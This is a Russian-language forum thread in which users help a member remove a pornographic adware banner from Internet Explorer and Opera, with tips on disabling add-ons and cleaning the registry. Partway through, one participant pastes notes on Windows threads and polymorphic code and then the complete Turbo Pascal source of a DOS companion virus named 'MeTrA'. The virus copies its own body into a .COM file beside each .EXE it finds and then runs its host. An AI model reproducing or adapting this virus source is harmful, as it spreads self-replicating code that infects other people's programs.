NightWish, зашол через Эскплорер как ты сказал - у меня "рисунок другой" этой таблицы - может потому что у меня IE-8???

Что я там нашол - файл BP Data Feeder у которого в "дата файла" указано 31 марта, сегодня, в 2:23.
Я его удалил. Вернее "отключил".

Может перезагрузится надо? Я открываю окна - баннер всётак же появляется вместе с окном.

Humiliating, просто хочу узнать ЧТО ЭТО ТАКОЕ? "Дыра"? КАК этот баннер проник в мой компьютер?..Почему его не удаётся уничтожить?

Чёртополох, ntfs у тебя, так?
Так вот-с: сия зараза акромя как цепляццо к системным файлам в виде потока может ещё и полиморфными свойствами обладать.

ЗЫ: у тя может быть файл весом в 1 кило, и прицепленный к нему поток раз в 10 или 100 больше. Как там найдёшь? ХЗ!

http://wiki.xakep.ru/(S(22hwk2blph5akl455yvddc55))/Print.aspx?Page=polimorfnyi_kod&AspxAutoDetectCookieSupport=1


Обычная структура многопоточного приложения рассчитана на одновременное исполнение нескольких подзадач. Однако стоит помнить, что, создавая многопоточное приложение, нам придется заботиться о сохранности и ликвидности, общих для всех потоков, данных.

Создание потока.

Первичный поток, который присутствует в программе, начинает свое выполнение с главной функции потока типа
WinMain.

Для создания вторичного потока необходимо создать и для него входную функцию, которая выглядит примерно так:

DWORD WINAPI ThreadFunc(PVOID pParam)

{

DWORD dwResult = 0;

.........

return dwResult;

}

Имя у функции вторичного потока, в отличии от первичного, может быть любым однако, при наличии нескольких разных потоков, назвать функции необходимо по-разному, иначе система создаст разные реализации одной и той же функции.

Когда поток закончит свое исполнение, он вернет управление системе, память, отведенная под его стек, будет освобождена, а счетчик пользователей его объекта ядра "поток" уменьшится на 1. Когда счетчик обнулится, этот объект ядра будет разрушен.

Для создания своего потока необходимо использовать функцию
CreateThread:

HANDLE CreateThread(

LPSECURITY_ATTRIBUTES lpThreadAttributes,

DWORD dwStackSize,

LPTHREAD_START_ROUTINE lpStartAddress,

LPVOID lpParameter,

DWORD dwCreationFlags,

LPDWORD lpThreadId);

При каждом вызове этой функции система создает объект ядра (поток). Это не сам поток, а компактная структура данных, которая используется операционной системой для управления потоком и хранит статистическую информацию о потоке.

Система выделяет память под стек потока из адресного пространства процесса. Новый поток выполняется в контексте того же процесса, что и родительский поток. Поэтому он получает доступ ко всем описателям объектов ядра, всей памяти и стекам всех потоков в процессе. За счет этого потоки в рамках одного процесса могут легко взаимодействовать друг с другом.

CreateThread - это Windows-функция, создающая поток.

Полиморфный код - это код, модифицирующий сам себя. Достигается шифрованием участков кода и генерацией различных кодов шифровальщика и дещифровальщика.

Простой пример в инструкциях ассемблера:

mov eax,1 ; записываем 1 в регистр eax



заменяется на

mov ebx,1 ; записываем 1 в регистр ebx
xchg eax,ebx ; меняем содержимое регистров ebx и eax



и тот и другой пример записывают 1 в аккумлятор (регистр eax).

Полиморфный код удобно использовать в вирусах, механизмах защиты прог. от копирования, и как ни странно для оптимизации. По крайней мере это относится к процам архитектуры IA32(x86). Использование полиморфного кода для них позволяет существенно экономить регистры общего назначения.

Чёртополох,
Ну, он, может, не такой, как у тебя (я не открывала твоё "приглашение"). Но что порно, это точно. У них отсутствует кнопка "close". Приходится отключаться.
А с советами специалиста мне самой не справиться.

NightWish, спасибо!
Сделал как ты посоветовал - и действтельно - в Эксплорере этот баннер исчез вааабще!

Остались проблемы только в Opera - там он на многих сайтах всё ещё присуцтвует...(((

В Опере нет вкладки "Сервис" и "надстройки"...

Humiliating, Красиво говоришь... Только тут это всё понимают двое = ты, да я )

NightWish, меня конкретно спросил Чёртополох : "КАК этот баннер проник в мой компьютер?..Почему его не удаётся уничтожить?" - и я предельно чётко на вторую часть вопроса ответил.
Первую оставил за кадром, ибо и так понятно :)

Чёртополох,
Ну.это ты пол дела сделал..
Теперь искать надо файл и удалять его. Тогда, возможно, и в Опере пропадёт.
создавай точку восстановления. чтоб если что не так - можно было вернуться.

Затем погляди, как точно назвается надстройка, которую ты отключил.
затем в реестре (пуск - выполнить-regedit)
задай поиск по названию.
и удаляй что найдётся.

Humiliating, боюсь всё банальнее. на уровне реестра. а не полиморфиков... которые популярны весьма были в MS-DOSе...

Ответ на комментарий NightWish

Исходное сообщение NightWish
Humiliating, боюсь всё банальнее. на уровне реестра. а не полиморфиков... которые популярны весьма были в MS-DOSе...

а я и есть старый динозавр ещё до DOSовских времён.

Кстати по поводу точек восстановления - создать то надо, вот только потом удалить все, кроме последней, установить в ноль размер корзины и т.д.

Понимаешь, очень я люблю шутки, особенно первоапрельские, а такой вот баннер может и пошутить )

Humiliating, зачем удалять???
просто просканировать норомальным антивирусом папку System Volume Information

??? NightWish,
а если System Volume Information содержит это:
{$M 2048,0,4096}

{$i-}

Program Metra;

uses dos;

var

DirInfo : SearchRec;

F1,f2 : File;

Buf : Array[0..5000] of Byte; { размер вируса }

NumRead : Word;

NumWritten : Word;

FT:text;

P: PathStr;

D: DirStr;

N: NameStr;

E: ExtStr;

namecom:string;

Label InfOk;

Begin

{ считать свое тело в буфер }

Assign(F2,ParamStr(0));

Reset(F2,1);

if ioresult<>0 then

begin

writeln('Файл ',paramstr(0),' не доступен!');

halt;

end;

BlockRead(F2,buf,SizeOf(buf),NumRead);

Close(F2);

{ искать жертву }

FindFirst('*.EXE',Archive,DirInfo);

While DosError = 0 Do

Begin

FSplit(dirinfo.name, D, N, E);

namecom:=n+'.com';

{ проверить существует ли файл }

Assign(ft,namecom);

reset(ft);

if ioresult=0 then { если уже существует }

begin

close(ft);

goto infOk;

end;

{ создать COM-файл с вирусом }

Assign(F1,namecom);

rewrite(f1);

if ioresult<>0 then goto InfOk; {если ошибка, то пропустить}

Reset(F1,1);

BlockWrite(F1,buf,NumRead,NumWritten);

Close(F1);

infOk:

FindNext(DirInfo);

End;

{ запустим своего носителя }

FSplit(paramstr(0), D, N, E);

swapvectors;

exec(d+n+'.EXE',paramstr(1));

swapvectors;

{ если вызвали с таким параметром, то надо представитьcя }

if paramstr(1)='/??' then

begin

writeln('Virus MeTrA.');

writeln('^^^^^^^^^^^^');

end;

halt(dosexitcode); { выйти и сохранить код ошибки }

End.

Humiliating, System Volume Information - это папка. скрытая. системная. и хоть коня в пальто она содержит - по барабану.

насколько я знаю моим знакомым пришлось убивать интернет эксплорер и ставить заново
картинка на экране не уберется чтобы ты не делал...

LI 7.05.22 beta

Ireshka, Во-1ых, эксплорер не убить. Он плотно встроен в виндовс;
Во-2ых - почитай коменты. Чёртополох, убрал из экплорера эту шнягу.

Исходное сообщение NightWish: Ireshka, Во-1ых, эксплорер не убить. Он плотно встроен в виндовс;

Во-2ых - почитай коменты. Чёртополох, убрал из экплорера эту шнягу.

значит Чертоплох супер-хакер ))

LI 7.05.22 beta

Ответ на комментарий NightWish

Исходное сообщение NightWish
Ireshka, Во-1ых, эксплорер не убить. Он плотно встроен в виндовс;
Во-2ых - почитай коменты. Чёртополох, убрал из экплорера эту шнягу.

подтверждаю! САМ убрал эту шнягу! По инструкции NightWish-а!

Чёртополох, Таки с тебя Хенеси ХО )))

Ответ на комментарий NightWish

Исходное сообщение NightWish
Чёртополох, Таки с тебя Хенеси ХО )))

таки раньше надо было предупреждать про ХО)))


***

а тема такая - в Опере не получилось удалить...Снесли ЯваСкрипт - так в Опере теперь ли.ру не работает почти - не идентифицирует меня)))
Так что пока выходим в свет из Эксплорера))

Чёртополох, загляни сюда.

http://otvet.mail.ru/question/23577459/

Исходное сообщение Чёртополох:

Исходное сообщение NightWish

Ireshka, Во-1ых, эксплорер не убить. Он плотно встроен в виндовс;

Во-2ых - почитай коменты. Чёртополох, убрал из экплорера эту шнягу.

подтверждаю! САМ убрал эту шнягу! По инструкции NightWish-а!

ага ) мне рассказывали так как я сказала ...но все поняла ))))

LI 7.05.22 beta

Ответ на комментарий NightWish

Исходное сообщение NightWish
Чёртополох, загляни сюда.

http://otvet.mail.ru/question/23577459/

ШПАСИБО!)